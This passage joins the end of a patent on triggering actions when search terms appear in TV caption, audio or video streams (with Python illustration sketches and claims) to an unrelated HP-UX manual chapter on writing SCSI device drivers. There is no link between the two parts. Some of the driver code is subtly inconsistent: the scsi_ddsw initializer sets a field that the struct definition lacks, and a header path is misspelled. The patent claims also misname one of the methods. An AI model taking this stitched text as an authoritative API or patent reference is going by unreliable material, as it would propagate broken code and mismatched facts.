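print(run_search(stream, pairs))  # prints ['launch quiz page']
```

In a real deployment the action would be any programmatically initiable operation (open a web page, start PVR recording, mute a commercial), as the paragraph above notes.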
[0035] Shown in FIG. 4 is a more detailed process flow diagram illustrating the stages involved in synchronizing content with a show in one aspect of the current invention. In one form, the process of FIG. 4 is at least partially implemented in the operating logic of system 100. The process begins at start point 240 with receiving at least one broadcast stream (stage 242). A search page having one or more search/action pairs is received from a transmission path, such as one separate from the broadcast stream (stage 244). The search page is bound to at least one search object (e.g. search class 260 in FIG. 5) (stage 246). As a non-limiting example, search program 200 can create the search object. Callback methods are registered so methods in the search page for associated actions are called when a match is found (stage 248). The callback method is then called to perform the associated action when a match to the search criteria is found in the broadcast stream (stage 250). The result of the action is then synchronized with the show (stage 252). The process then ends at end point 254.
[0036] Turning now to FIG. 5, a class diagram is shown that illustrates the methods used in synchronizing content with a show in one aspect of the current invention. Search class 260 includes three methods: SetSearch(), SearchFnTemplate(), and ClearSearch(). In one aspect of the invention, the SetSearch method 262 is responsible for initiating the extraction of content from the broadcast stream and searching for a match. In one aspect of the invention, the SetSearch method 262 is also responsible for registering the callback methods for the associated actions using the SearchFnTemplate method 264 as a template for the structure of the callback method. The ClearSearch method 266 is responsible for deleting the system resources used in running a particular search.
[0037] In one aspect of the invention, the SetSearch method 262 accepts one or more of the following parameters: streamId, searchFn, regExp, mode, idSearch, deltaTimeShift, startTime, endTime, and dwCookie. One or more of these parameters may be optional and/or omitted. The streamId parameter is used to indicate an identifier of the particular stream to search for the search criteria, such as “CC1” or “CC2” for a close caption stream. The searchFn parameter is used to indicate the name of the callback search function to call when the specified criteria has been located/matched in the stream. The regExp parameter is related to the type of the stream. As one non-limiting example, for text based streams, the regExp parameter can be a regular expression or other string that indicates the string to match in the stream. The regExp parameter can include a full or partial string to match, including wildcards or other variations as would occur to one in the art. As another non-limiting example, for video streams, the regExp parameter can be a video image to match. For audio streams, as a non-limiting example, the regExp parameter can be a sound byte to match. For audio and/or video streams, the regExp parameter can include a full and/or partial value to match. Alternatively or additionally, the particular stream could be converted to a string or other data type suitable for matching. The mode parameter indicates how long the search should be performed, such as once, recurring, etc. In one aspect of the invention, if once is specified, the search terminates after the first matching string. If recurring is specified, then the search keeps on matching strings until terminated manually or systematically.
[0038] The idSearch parameter is an identifier for the search, and may or may not be unique. The deltaTimeShift parameter specifies the delay in presentation time from when the search string is matched and the callback method is kicked off. As one non-limiting example, the deltaTimeShift
parameter can be used in a scenario where the action to perform when a match is found includes initiating the recording of a television show on a PVR after a certain portion of a segment begins to air featuring someone the user wants to record. The startSearchTime parameter specifies the time the search started, and the endSearchTime parameter specifies the time the search ended. One non-limiting example of when the startSearchTime and endSearchTime parameters might be used is to synchronize content in the third quarter of a sports game. The SetSearch method 262 outputs a dwCookie parameter that is a unique identifier for the search that can be used to free system resources associated with the search, as well as used for other purposes as desired.
In one aspect of the invention, the SearchFnTemplate method 264 serves as the callback template method for the methods of the associated actions that are called when a particular search criteria is matched in the broadcast stream. The SearchFnTemplate method 264 can include one or more of the following input parameters: ccMatched, idSearch, timeStart, and/or timeEnd. One or more of these parameters may be optional and/or omitted. In one aspect of the system, for text-based streams, the ccMatched parameter is the actual string matched in the search. For other stream types, such as audio and/or video streams, the ccMatched parameter is the matched section of that stream. The idSearch parameter is an identifier for the search, and may or may not be unique. The timeStart parameter is the presentation time of the first field (e.g. character) in the search string and the timeEnd parameter is the presentation time of the last field (e.g. character) in the search string. The timeStart and timeEnd parameters may be offset by the deltaTimeShift parameter specified in the SetSearch method 262. As one non-limiting example, the timeStart parameter can be used in external (post-processing) stages to realign stages with the video. As one non-limiting example, the timeEnd parameter can be used as a synchronization point to base further animations from.
The ClearSearch method 266 can include one or more of the following parameters: dwCookie. The dwCookie parameter is a unique identifier for the particular search and allows the ClearSearch method 266 to free the system resources associated with the search.
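As a non-limiting illustration of how search class 260 might behave, the sketch below mirrors the SetSearch/SearchFnTemplate/ClearSearch contract in Python. It is a stand-in under stated assumptions, not the disclosed implementation: the dictionary registry, integer dwCookie values, and the hypothetical feed method that pushes extracted stream portions through the matcher are all invented here.

```python
import itertools
import re

class Search:
    """Hypothetical analogue of search class 260 (FIG. 5)."""

    def __init__(self):
        self._cookie = itertools.count(1)
        self._searches = {}  # dwCookie -> (regExp, searchFn, mode, idSearch)

    def SetSearch(self, streamId, searchFn, regExp, mode="Once", idSearch=None):
        """Register a search and its callback; return a unique dwCookie."""
        dwCookie = next(self._cookie)
        self._searches[dwCookie] = (regExp, searchFn, mode, idSearch)
        return dwCookie

    def ClearSearch(self, dwCookie):
        """Free the resources associated with one search."""
        self._searches.pop(dwCookie, None)

    def feed(self, portion, timeStart=0, timeEnd=0):
        """Offer one extracted portion of the stream to every active search."""
        for dwCookie, (regExp, searchFn, mode, idSearch) in list(self._searches.items()):
            if re.search(regExp, portion):
                # Callback follows the SearchFnTemplate parameter shape.
                searchFn(portion, idSearch, timeStart, timeEnd)
                if mode == "Once":
                    self.ClearSearch(dwCookie)  # once mode: stop after first match

# Usage: a once-mode search for "Mary" on the CC1 close caption stream.
hits = []
search = Search()
cookie = search.SetSearch("CC1", lambda m, i, t0, t1: hits.append(m), "Mary")
search.feed("Mary had a little lamb")
search.feed("Mary again")  # already cleared: once mode matched and stopped
print(hits)  # prints ['Mary had a little lamb']
```

The once/recurring distinction of the mode parameter falls out naturally: a recurring search simply stays registered until ClearSearch is called.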
One of ordinary skill in the software art will appreciate that the methods in search class 260 could be arranged differently with more or fewer parameters, could perform more or fewer operations, and/or could call other methods to perform the operations described. Furthermore, one of ordinary skill in the software art will appreciate that one or more of the methods in search class 260 could be modified so that the return value is not from the particular stream being matched, but instead is from another co-time-located stream and/or a time indicator in the show. As one non-limiting example, when a particular sound occurs in the show (the value being matched), a certain picture could be returned (the value being returned).
Turning now to FIGS. 6-10, some hypothetical examples will be used to further illustrate some of the techniques discussed in FIGS. 1-5. These examples are illustrative only and the techniques described herein could be used in numerous other scenarios. Beginning with FIG. 6, a process flow diagram illustrates performing serial matching based on a “Mary had a little lamb” hypothetical. Serial matching is used when certain searches must be processed in a specific order, and/or when one or more actions should be performed only if all of the search criteria are met in that exact order. Serial matching may be useful, for example, when a live show is being broadcast and certain details are not known in advance, so the action should wait until the criteria have been matched completely and in a certain exact order. Serial matching does not work as well when part of the content required for a match arrives garbled, or when the show is joined mid-stream and some of the content that includes the search criteria has already been broadcast.
The process on FIG. 6 begins with running the OnLoad 270 event from the search page. The first search is looking for “Mary” 272. The stream is searched until “Mary” 274 is located. When “Mary” is actually located 276, then the search proceeds with searching for “Had” 278. The stream is then searched until “Had” 280 is located. When “Had” is actually located 282, then the search proceeds with searching for “Little”. The process follows this serial pattern for each of the remaining phrases until “Lamb” is actually found 294.
FIG. 7 illustrates a sample HTML page containing VBScript code for implementing the serial matching process described in FIG. 6. As one non-limiting example, this starting page containing the search/action pairs could be downloaded from the Internet. Other scenarios for obtaining the start page could also be used as were discussed previously. A bind method 300 binds the page to a search object (e.g. an instance of search class 260). When the OnLoad event 302 runs, the SetSearch method is called to set up the first search for “Mary”. The SetSearch method is passed the streamId value “CC1” for close caption stream, “ActMary” for the searchFn value to specify the name of the callback function, “Mary” for the regExp string to match value, and “Once” for the mode to specify how many matches to look for. Behind the scenes, the callback function ActMary is registered, and when a match is actually found for “Mary”, the ActMary method 304 is called. The ActMary method 304 then sets up the next search by calling the SetSearch method with the new criteria. This pattern then repeats by calling the ActHad method 306, the ActLittle method 308, and the ActLamb method 310 at the appropriate times in serial order when the matches are found. When the ActLamb method 310 is called at the end of the serial process, it performs the desired action and synchronizes the action with the show content, which in this example is to launch a web page showing a “Test Your Little Lamb Knowledge” quiz while the show is airing (see FIG. 10 discussed in a following section).
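The chained-callback pattern of FIGS. 6-7, in which each match’s callback sets up the next search, can be modeled as a small state machine. The following is a hypothetical Python sketch rather than the VBScript of FIG. 7; the SerialMatcher name and feed interface are invented for illustration:

```python
import re

class SerialMatcher:
    """Matches a list of search strings strictly in order, as in FIGS. 6-7.

    Each successful match plays the role of a callback (e.g. ActMary) that
    sets up the next search; the final match fires the concluding action."""

    def __init__(self, words, final_action):
        self.words = list(words)
        self.final_action = final_action
        self.index = 0  # which search in the chain is currently registered

    def feed(self, portion):
        if self.index < len(self.words) and re.search(self.words[self.index], portion):
            self.index += 1                  # "callback" registers the next search
            if self.index == len(self.words):
                self.final_action()          # e.g. launch the quiz page

# Out-of-order text does not advance the chain; only the exact order completes it.
launched = []
m = SerialMatcher(["Mary", "Had", "Little", "Lamb"], lambda: launched.append("quiz"))
for portion in ["Lamb", "Mary", "Had", "Little", "Lamb"]:
    m.feed(portion)
print(launched)  # prints ['quiz']
```

Note how the early “Lamb” is ignored, which is exactly why serial matching fails when playback starts mid-stream: a word that already aired can never be matched at its place in the chain.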
Turning now to FIGS. 8 and 9, the same hypothetical will be used to illustrate a parallel matching process. A parallel matching process can be useful in scenarios where there are missing strings and/or when starting in a later part of a show after some content has already been broadcast. FIG. 8 illustrates the process flow and FIG. 9 illustrates the corresponding HTML page with VBScript that implements the process. Both figures will be referred to collectively in the following discussion. Again, the start page shown containing the search/action pairs in FIG. 9 could be downloaded over the Internet and/or obtained by some other means. The process begins with binding the web page to a search object (340 on FIG. 9) and then running the OnLoad
event 320 (342 on FIG. 9) that kicks off all of the searches 322. In the OnLoad event 320, five searches are registered using the SetSearch method that can be completed in any order (if at all): Mary 324, Had 326, A Little 328, Lamb 330, and 5 Seconds (timeout) 332. When searches for Mary 324, Had 326, and A Little 328 are matched, then the callback method 334 (344 on FIG. 9) is called. When searches for Lamb 330 and 5 Seconds (timeout) 332 are matched, the Done method 336 (346 on FIG. 9) is called. When the search for Lamb 330 completes with a successful match, the Done method 336 (346 on FIG. 9) clears up the resources by calling the ClearSearch method and then performs the final action, which is to display the “Test Your Little Lamb Knowledge” quiz and synchronize it with the show. As shown on FIG. 10, the simulated screen 350 includes, among other things, a TV window 352, as well as content window 354 for displaying the “Test Your Little Lamb Knowledge” quiz discussed in the hypothetical examples in FIGS. 6-9. One of ordinary skill in the art will appreciate that parallel and serial searches are opposite extremes of searching methods, and that combinations of these two searching methods could be used instead of or in addition to either of them alone.
Although the subject matter has been described in language specific to structural features and/or methodological acts, it is to be understood that the subject matter defined in the appended claims is not necessarily limited to the specific features or acts described above. Rather, the specific features and acts described above are disclosed as example forms of implementing the claims. All equivalents, changes, and modifications that come within the spirit of the inventions as described herein and/or by the following claims are desired to be protected.
For example, a person of ordinary skill in the computer software art will recognize that the client and/or server arrangements, user interface screen content, and/or data layouts as described in the examples discussed herein could be organized differently on one or more computers to include fewer or additional options or features than as portrayed in the examples and still be within the spirit of the invention.
What is claimed is:
1. A method of synchronizing content to television shows, comprising the steps of:
receiving at least one broadcast stream;
receiving a set of search instructions from a transmission path, the set of search instructions comprising at least one search criteria and at least one associated action to be performed;
processing the broadcast stream to extract portions of content;
determining that the at least one search criteria has been found in the extracted portions of content; and
initiating the at least one associated action, including synchronizing the action with a particular show being played.
2. The method of claim 1, wherein the broadcast stream is a captioning stream.
3. The method of claim 1, wherein the broadcast stream is an audio stream.
4. The method of claim 1, wherein the set of search instructions are received in a web page.
5. The method of claim 1, further comprising:
using timeshifting while the particular show is being played to make the action appear to occur before a point in time that the action was actually initiated.
6. The method of claim 1, wherein the search criteria is based at least in part upon a string value.
7. The method of claim 1, wherein the search criteria is based at least in part upon a sound.
8. The method of claim 1, wherein the search criteria is based at least in part upon one or more video frames.
9. The method of claim 1, wherein the step of determining that at least one search criteria has been found does not require an exact match.
10. The method of claim 1 wherein the set of search instructions are received by first receiving a guide entry for the particular show being played and then retrieving the search instructions at a particular URL specified in the guide entry.
11. The method of claim 1, wherein the transmission path is an Internet connection.
12. The method of claim 1, wherein the set of search instructions are specified by a user.
13. A computer-readable medium having computer-executable instructions for causing a computer to perform the steps recited in claim 1.
14. A method of synchronizing content to television shows, comprising the steps of:
receiving at least one broadcast stream;
receiving at least one search page from a transmission path, the search page comprising at least one search criteria and at least one associated action to be performed;
binding the search page to at least one search object;
from the search object, registering at least one search callback method, the callback method being located within the search page, and the callback method being operable to perform the associated action;
calling the callback method to perform the associated action when the search criteria is located in the broadcast stream; and
synchronizing the associated action with a particular show being played.
15. A computer-readable medium having computer-executable instructions for causing a computer to perform the steps recited in claim 14.
16. An application program interface for synchronizing content to television shows, the application program interface embodied on one or more computer readable media, comprising:
a SetSearch method having a plurality of call parameters comprising a search function to call, a value to search for, and a cookie ID, wherein the cookie ID is an output parameter, wherein the SetSearch method is operable to initiate searching of a particular broadcast stream to locate the value to match, wherein the SetSearch
method is further operable to register the search function as a callback method that is called when the value to match is located in the particular stream, and wherein the value to match is determined at least in part by a search instruction that is transmitted from a transmission path;
a SearchFineTemplate method having an actual value matched call parameter, wherein the SearchFineTemplate method is used as a template by the SetSearch method to register the search function as the callback method that performs a particular action based on the actual string matched, the action being related to delivering a desired content to a user in conjunction with a particular portion of a particular show; and
a ClearSearch method having the cookie ID call parameter as an input parameter, the ClearSearch method being operable to delete resources in use that are associated with the cookie ID.
17. The application program interface of claim 16, wherein the SetSearch method further comprises the following call parameter: a stream ID to identify the particular broadcast stream to search for the value to match.
18. The application program interface of claim 16, wherein the SetSearch method further comprises the following call parameter: a delta time shift to specify a delay in presentation time from when the value to match is located and when the search function is called.
19. The application program interface of claim 16, wherein the SetSearch method further comprises the following call parameters: a start search time and an end search time.
20. The application program interface of claim 16, wherein the SearchFineTemplate method further comprises the following call parameters: a start time indicating a starting time of a first field in the value to match, and an end time indicating an ending time of a last field in the value to match.
* * * * *
9 Writing SCSI Device Drivers
This chapter presents routines and conceptual material specifically for drivers of SCSI devices. Chapter 5, “Writing a Driver,” describes the general configuration and entry-point driver routines, such as `driver_open` and `driver_write`. If you are writing a SCSI driver, you must provide routines from both Chapter 5, “Writing a Driver,” and this chapter.
The HP-UX Driver Development Reference describes the SCSI Services routines.
SCSI devices can be controlled in two ways, both supported by the SCSI Services routines. Kernel drivers, following the `scsi_disk` model, are the traditional method. They are described in this chapter and in `scsi_disk(7)`. However, many SCSI devices do not need a special driver. Instead, user-programs pass ioctl commands to the pass-through driver, `scsi_ctl`. The pass-through driver is described in `scsi_ctl(7)`.
The following sections provide the suggested steps for developing a SCSI driver:
- “SCSI Driver Development, Step 1: Include Header Files”
- “SCSI Driver Development, Step 2: Set Up Structures”
- “SCSI Driver Development, Step 3: Create the driver_install Routine”
- “SCSI Driver Development, Step 4: Create the driver_dev_init() Routine”
- “SCSI Driver Development, Step 5: Analyze Multiprocessor Implications”
- “SCSI Driver Development, Step 6: Create the Entry-Point Routines”
- “SCSI Driver Development, Step 7: Error Handling”
- “SCSI Driver Development, Step 8: Underlying Routines”
The examples in this chapter assume that the name of your driver is `mydriver` and that you are following the routine-naming conventions described in “Step 1: Choosing a Driver Name” on page 76, Chapter 5.
SCSI Driver Development, Step 1: Include Header Files
See reference pages for each kernel call and data structure your driver uses to find out which headers your driver requires.
NOTE
Including header files that your driver does not need increases compile time and the likelihood of encountering portability problems. It is not recommended.
General Header Files
- `/usr/include/sys/buf.h`: I/O `buf` structure, `buf`.
- `/usr/include/sys/errno.h`: Defines errors returned to applications.
- `/usr/include/sys/file.h`: Defines open flags.
- `/usr/include/sys/io.h`: The `isc` table structure.
- `/usr/include/sys/malloc.h`: Necessary for acquiring and releasing memory.
- `/usr/include/sys/wsio.h`: WSIO context data and macro definitions.
Header Files for SCSI Drivers
- `/usr/include/sys/scsi.h`: SCSI-specific data definitions and ioctl commands.
- `/usr/include/sys/scsi_ctl.h`: SCSI subsystem data and macro definitions.
Header Files for Device Classes
In addition to the header file created for the specific driver, your driver may need other, device-class-specific files.
- `/usr/include/sys/diskio.h`: Data definitions for disk ioctl commands (DIOC_xxx). Includes `/usr/include/sys/types.h` and `/usr/include/sys/ioctl.h`.
- `/usr/include/sys/floppy.h`: Data definitions for floppy ioctl commands.
- `/usr/include/sys/mtio.h`: Data definitions for magnetic tape ioctl commands.
SCSI Driver Development, Step 2: Set Up Structures
Depending on the characteristics of the driver, you can set it up as a character driver, a block driver, or (as in the case of disk drivers) both.
NOTE
Whether the driver is to operate on an MP platform or not, SCSI Services makes use of the locking facilities, and all drivers using SCSI Services must use the provided data-protection routines. It is essential that you include the C_ALLCLOSES and C_MGR_IS_MP flags in the drv_ops_t structure and the DRV_MP_SAFE flag in the drv_info_t structure. See “SCSI Driver Development, Step 5: Analyze Multiprocessor Implications” for more information.
Determine the driver's name and device class, and put this information in the appropriate structures. (See “Step 3: Defining Installation Structures” on page 80, Chapter 5, for information about these data structures.)
First, declare your driver's routines that can be called by the kernel. These are used in the following structure.
```c
int mydriver_open();
int mydriver_close();
int mydriver_strategy();
int mydriver_psize();
int mydriver_read();
int mydriver_write();
int mydriver_ioctl();
```
The drv_ops_t structure specifies the “external” driver routines to the kernel. The C_ALLCLOSES and C_MGR_IS_MP flags are required by SCSI Services. See “The drv_ops_t Structure Type” on page 80, Chapter 5, for further details.
```c
static drv_ops_t mydriver_ops =
{
mydriver_open,
mydriver_close,
mydriver_strategy,
NULL,
};
```
The `drv_info_t` structure specifies the driver's name (`mydriver`) and class (`disk`). Flags define the driver type. The `DRV_MP_SAFE` flag is required by SCSI Services. See "The `drv_info_t` Structure Type" on page 83, Chapter 5, for further details.
```c
static drv_info_t mydriver_info =
{
"mydriver",
"disk",
DRV_CHAR | DRV_BLOCK | DRV_SAVE_CONF | DRV_MP_SAFE,
-1,
-1,
NULL,
NULL,
NULL,
NULL,
C_ALLCLOSES | C_MGR_IS_MP
};
```
The `wsio_drv_data_t` structure specifies additional information for the WSIO CDIO. The first field should be `scsi_disk` for SCSI device drivers and `scsi` for SCSI interface drivers. See "The `wsio_drv_data_t` Structure Type" on page 85, Chapter 5, for further details.
```c
static wsio_drv_data_t mydriver_data =
{
"scsi_disk",
T_DEVICE,
DRV_CONVERGED,
NULL,
NULL,
};
```
The `wsio_drv_info_t` structure ties the preceding three together. See "The `wsio_drv_info_t` Structure Type" on page 86, Chapter 5, for further details.
```c
static wsio_drv_info_t mydriver_wsio_info =
{
&mydriver_info,
&mydriver_ops,
&mydriver_data,
};
```
SCSI Driver Development, Step 3: Create the driver_install Routine
The `driver_install` routine causes the information that you created above to be installed into the I/O subsystem, specifically into the WSIO CDIO.
```c
int (*mydriver_saved_dev_init)();
int mydriver_install()
{
extern int (*dev_init)();
mydriver_saved_dev_init = dev_init;
dev_init = mydriver_dev_init;
/* register driver with WSIO and return any error */
return(wsio_install_driver(&mydriver_wsio_info));
}
```
SCSI Driver Development, Step 4: Create the driver_dev_init() Routine
You specify the `driver_dev_init` routine from the `driver_install()` routine. The `driver_dev_init` routine calls `scsi_ddsw_init()`, which initializes some fields in the SCSI driver's device-switch table (`scsi_ddsw`). This table is independent of the kernel's device switch tables.
```c
mydriver_dev_init()
{
dev_t dev = NODEV;
/*
* Initialize mydriver_ddsw.blk_major and
* mydriver_ddsw.raw_major.
*/
scsi_ddsw_init(mydriver_open, &mydriver_ddsw);
(*mydriver_saved_dev_init)();
}
```
Setting up the Device-Switch Table (`scsi_ddsw`)
In order to use SCSI Services effectively, a SCSI driver must define its `scsi_ddsw` device-switch structure. This structure contains pointers to special `dd` routines, some of which are executed indirectly by the standard driver routines, such as `driver_read`. The structure is passed to SCSI Services routines from the `driver_open` routine, which calls the `scsi_lun_open()` SCSI Services routine.
SCSI Services has been set up to control the housekeeping and other processing in the SCSI interface. Therefore, you should have the standard driver routines restrict their operation to calling the appropriate SCSI Services routine, as shown in the examples in “SCSI Driver Development, Step 6: Create the Entry-Point Routines”. Special processing and customization should all be handled in the special `dd` routines.
For a summary of SCSI Services, see “SCSI Services Summary”. For more detailed information, see the HP-UX Driver Development Reference.
The `scsi_ddsw` structure is defined as follows in the header file `<sys/scsi_ctl.h>`:
```c
struct scsi_ddsw
{
u_char blk_major;
u_char raw_major;
int dd_lun_size;
int (*dd_open)();
void (*dd_close)();
int (*dd_strategy)();
int (*dd_read)();
int (*dd_write)();
int (*dd_ioctl)();
int (*dd_start)();
int (*dd_done)();
int (*dd_pass_thru_okay)();
int (*dd_pass_thru_done)();
int (*dd_ioctl_okay)();
struct buf (*dd_start_list);
int dd_status_cnt;
ubit32 dd_flags;
wsio_drv_info_t *wsio_drv;
};
```
The entries are described below.
**blk_major, raw_major**
Block and character major numbers; specify them as NODEV. They are initialized by `scsi_ddsw_init()` when it is called from your `driver_dev_init()` routine.
**dd_lun_size**
The number of bytes to be allocated and attached to the open device tree when `driver_open()` is first executed.
**dd_open(), dd_close(), dd_strategy(), dd_read(), dd_write(), dd_ioctl()**
Pointers to underlying driver-specific routines. When the corresponding driver entry-point routine is called by the kernel and transfers control to SCSI Services, SCSI Services performs certain overhead operations and then calls these routines for driver-specific operations.
**dd_start()**
Driver-specific start routine.
**dd_done()**
Driver-specific post-I/O processing.
**dd_pass_thru_okay()**
Driver-specific control of pass-through I/O.
**dd_pass_thru_done()**
Driver-specific notification of pass-through I/O.
**dd_ioctl_okay()**
Disallows ioctl commands through the pass-through driver.
**dd_flags**
Flag bits; currently only DD_DD is defined.
Here is an example of an initialized declaration of the scsi_ddsw structure. First comes the declaration of your driver's versions of the dd routines that SCSI Services can call. The routine names are arbitrary; the names in the comments are the field names of the scsi_ddsw structure.
```c
int mydriver_dd_open(); /* dd_open */
void mydriver_dd_close(); /* dd_close */
int mydriver_dd_strategy(); /* dd_strategy */
int mydriver_dd_read(); /* dd_read */
int mydriver_dd_write(); /* dd_write */
int mydriver_dd_ioctl(); /* dd_ioctl */
struct buf mydriver_dd_start(); /* dd_start */
int mydriver_dd_done(); /* dd_done */
int mydriver_dd_pass_thru_okay(); /* dd_pass_thru_okay */
int mydriver_dd_pass_thru_done(); /* dd_pass_thru_done */
int mydriver_dd_ioctl_okay(); /* dd_ioctl_okay */
```
The following example shows the scsi_ddsw structure. Specify NULL for routines that are not defined (that is, that you are not using). The first two fields specify the block and character major numbers; they are filled in by the call in driver_dev_init() to the SCSI Services routine scsi_ddsw_init(). The last field points to the wsio_drv_info_t structure that you defined in “SCSI Driver Development, Step 2: Set Up Structures”. The first name in each comment is the field name of the scsi_ddsw structure element.
```c
struct scsi_ddsw mydriver_ddsw =
{
NODEV, /* blk_major - mydriver_dev_init sets */
NODEV, /* raw_major - mydriver_dev_init sets */
sizeof(struct mydriver_lun), /* dd_lun_size */
mydriver_dd_open, /* dd_open */
mydriver_dd_close, /* dd_close */
mydriver_dd_strategy, /* dd_strategy */
NULL, /* dd_read */
NULL, /* dd_write */
mydriver_dd_ioctl, /* dd_ioctl */
mydriver_dd_start, /* dd_start */
mydriver_dd_done, /* dd_done */
mydriver_dd_pass_thru_okay, /* dd_pass_thru_okay */
mydriver_dd_pass_thru_done, /* dd_pass_thru_done */
mydriver_dd_ioctl_okay, /* dd_ioctl_okay */
mydriver_dd_status_list, /* dd_status_list */
sizeof(mydriver_dd_status_list) /
    sizeof(mydriver_dd_status_list[0]), /* dd_status_cnt */
mydriver_dd_flags, /* dd_flags (DD_DD) */
&mydriver_wsio_info /* wsio_drv: for diagnostics logging;
                       NULL means errors print in dmesg */
};
```
SCSI Driver Development, Step 5: Analyze Multiprocessor Implications
You need to make your device driver MP safe, regardless of whether it will operate on an MP platform. SCSI Services makes use of the kernel's locking facilities, so all drivers that use SCSI Services must use the data-protection routines the kernel provides.
Your drivers must do the following:
• Set the C_MGR_IS_MP flag in the d_flags field of the driver’s drv_ops_t structure.
• Set the DRV_MP_SAFE flag in the flags field of the drv_info_t structure.
• Use the driver semaphore, driver lock, LUN lock, and target lock as necessary to provide MP protection. Refer to the defines and structures in /usr/include/sys/scs_ctl.h for details. This is the largest task, and involves looking at the code and determining whether there are data references that must be protected and which locks and semaphores must be used to protect the references. (See “Data Protection for SCSI Drivers” for more details.)
• Build a kernel with your driver.
• Test your driver on a single processor (UP) system with a debug kernel if available. (You can also test it on an MP system.)
SCSI Driver Development, Step 6: Create the Entry-Point Routines
For many of the entry points, SCSI Services perform much of the work. If you use `physio()`, `scsi_strategy()` will be called by your driver's `driver_strategy` routine. Hence, you need not create the underlying `ddsw->dd_read()` and `ddsw->dd_write()` routines. However, if your driver calls `scsi_strategy()`, you must specify a `ddsw->dd_strategy()` routine.
The `scsi_strategy()` routine cannot block because it can be called on the Interrupt Control Stack (ICS) by a `bp->b_call` routine.
**driver_open() Routine**
```c
mydriver_open(dev, oflags)
dev_t dev;
int oflags;
{
return (scsi_lun_open(dev, &mydriver_ddsw, oflags));
}
```
**driver_close() Routine**
```c
mydriver_close(dev)
dev_t dev;
{
return scsi_lun_close(dev);
}
```
**driver_read() Routine**
```c
mydriver_read(dev, uio)
dev_t dev;
struct uio *uio;
{
return scsi_read(dev, uio);
}
```
**driver_write() Routine**
```c
mydriver_write(dev, uio)
dev_t dev;
struct uio *uio;
{
    return scsi_write(dev, uio);
}
```
**driver_strategy() Routine**
The `driver_strategy()` routine does not return anything. It records errors in `bp->b_error`.
```c
mydriver_strategy(bp)
struct buf *bp;
{
    scsi_strategy(bp);
}
```
**driver_psize() Routine**
This example assumes that `driver_psize()` is never called when the device is closed. Note the use of the SCSI Services `m_scsi_lun()` function.
```c
mydriver_psize(dev)
dev_t dev;
{
    struct scsi_lun *lp = m_scsi_lun(dev);
    struct mydriver_lun *llp = lp->dd_lun;
    int rshift, nblks, size;

    nblks = llp->nblks;
    rshift = llp->devb_lshift;
    size = rshift > 0 ? nblks >> rshift : nblks << -rshift;
    return size;
}
```
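The shift-based size conversion in `driver_psize()` is easy to check in isolation. The helper below is a hypothetical stand-alone mirror of that arithmetic; the name `blocks_to_dev_bsize` and the plain `int` types are illustrative, not part of the SCSI Services API:

```c
#include <assert.h>

/* Hypothetical stand-alone mirror of the driver_psize() arithmetic:
 * apply a signed shift count to convert a device-block count into
 * DEV_BSIZE units. A positive count shifts right; a zero or negative
 * count shifts left by the negated amount. */
static int blocks_to_dev_bsize(int nblks, int rshift)
{
    return rshift > 0 ? nblks >> rshift : nblks << -rshift;
}
```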
**driver_ioctl() Routine**
```c
mydriver_ioctl(dev, cmd, data, flags)
dev_t dev;
int cmd;
int *data;
int flags;
{
    return scsi_ioctl(dev, cmd, data, flags);
}
```
SCSI Driver Development, Step 7: Error Handling
You can specify one optional list in the driver's `scsi_ddsw`: `dd_status_list[]`. SCSI services access this optional list when an I/O completion occurs on the driver's SCSI LUN. The SCSI Services internal routine `scsi_status_action()` determines what to do based upon this list.
The following are examples of very simple lists:
```c
struct sense_action mydriver_sense_list[] = {
{ S_GOOD, S_CURRENT_ERROR, S_RECOVERED_ERROR, SA_ANY, SA_ANY, mydriver_check_residue, SA_DONE | SA_LOG_IT_ALWAYS, 0 },
{ SA_ANY, SA_ANY, SA_ANY, SA_ANY, SA_ANY, scsi_action, SA_DONE + SA_LOG_IT_NEVER, EIO }
};
```
```c
struct status_action mydriver_status_list[] = {
{ S_GOOD, scsi_action, SA_DONE + SA_LOG_IT_NEVER, 0 },
{ S_CHECK_CONDITION, scsi_sense_action, (int) mydriver_sense_list, sizeof(mydriver_sense_list) / sizeof(mydriver_sense_list[0]) },
{ S_CONDITION_MET, scsi_action, SA_DONE + SA_LOG_IT_NEVER, 0 },
{ S_INTERMEDIATE, scsi_action, SA_DONE + SA_LOG_IT_NEVER, 0 },
{ S_I_CONDITION_MET, scsi_action, SA_DONE + SA_LOG_IT_NEVER, 0 },
{ SA_ANY, scsi_action, SA_DONE + SA_LOG_IT_ALWAYS, EIO }
};
```
Your driver can specify its own routines for handling errors, and can break down errors for more granularity. You can access the Pass-Thru Driver status using the driver's `dd_pass_thru_done()` routine, described in “SCSI Driver Development, Step 8: Underlying Routines”.
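To illustrate how a status list drives completion handling, here is a minimal, self-contained sketch of table-driven dispatch in the spirit of `scsi_status_action()`. All names and constant values here are illustrative assumptions, not the real `<sys/scsi_ctl.h>` definitions:

```c
#include <assert.h>
#include <stddef.h>

/* Illustrative values only; real constants live in <sys/scsi_ctl.h>. */
#define MY_SA_ANY  (-1)   /* wildcard: matches any status */
#define MY_S_GOOD  0x00
#define MY_S_CHECK 0x02

struct my_status_action {
    int status;                        /* status byte to match, or MY_SA_ANY */
    int (*action)(int status, int arg);
    int arg;                           /* e.g. an errno to report */
};

static int act_done(int status, int arg)
{
    (void)status;
    return arg;                        /* pretend to complete the I/O */
}

/* Walk the list in order and run the first entry whose status matches,
 * the way a dd_status_list is consulted on I/O completion. */
static int dispatch_status(const struct my_status_action *list,
                           size_t n, int status)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (list[i].status == status || list[i].status == MY_SA_ANY)
            return list[i].action(status, list[i].arg);
    return -1;                         /* no entry matched */
}
```

The ordering of entries matters: the catch-all `MY_SA_ANY` row must come last, exactly as in the `mydriver_status_list[]` example above.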
SCSI Driver Development, Step 8: Underlying Routines
This is where the driver can be as complex as you desire, or as the device requires. The `scsi_lun_open()` routine ensures that the bus, target, and LUN of the driver’s device are open and able to handle I/O. Specific requirements for the device itself should be addressed in the driver’s `ddsw->dd_open()` routine. The same principle applies for `close`, `read`, `write`, and so on.
The call graph in Figure 9-1, “Call Graph of SCSI Routines and Services,” shows how these underlying routines and SCSI services call each other. For a summary list of SCSI Services, see “SCSI Services Summary”. Detailed information on SCSI Services is provided in the HP-UX Driver Development Reference.
dd_close Routine
The `dd_close()` SCSI function, which provides driver-specific processing during close, is supplied by the driver writer. It can have any unique name. You pass the name to SCSI Services by specifying it in the `dd_close` field of the `scsi_ddsw` structure.
If this routine is defined in the `scsi_ddsw` structure, it is called to perform the actual device close processing. For example, for the `scsi_disk` driver, the `sd_close()` function performs the Test Unit
Ready and Allow Media Removal commands.
**Conditions**
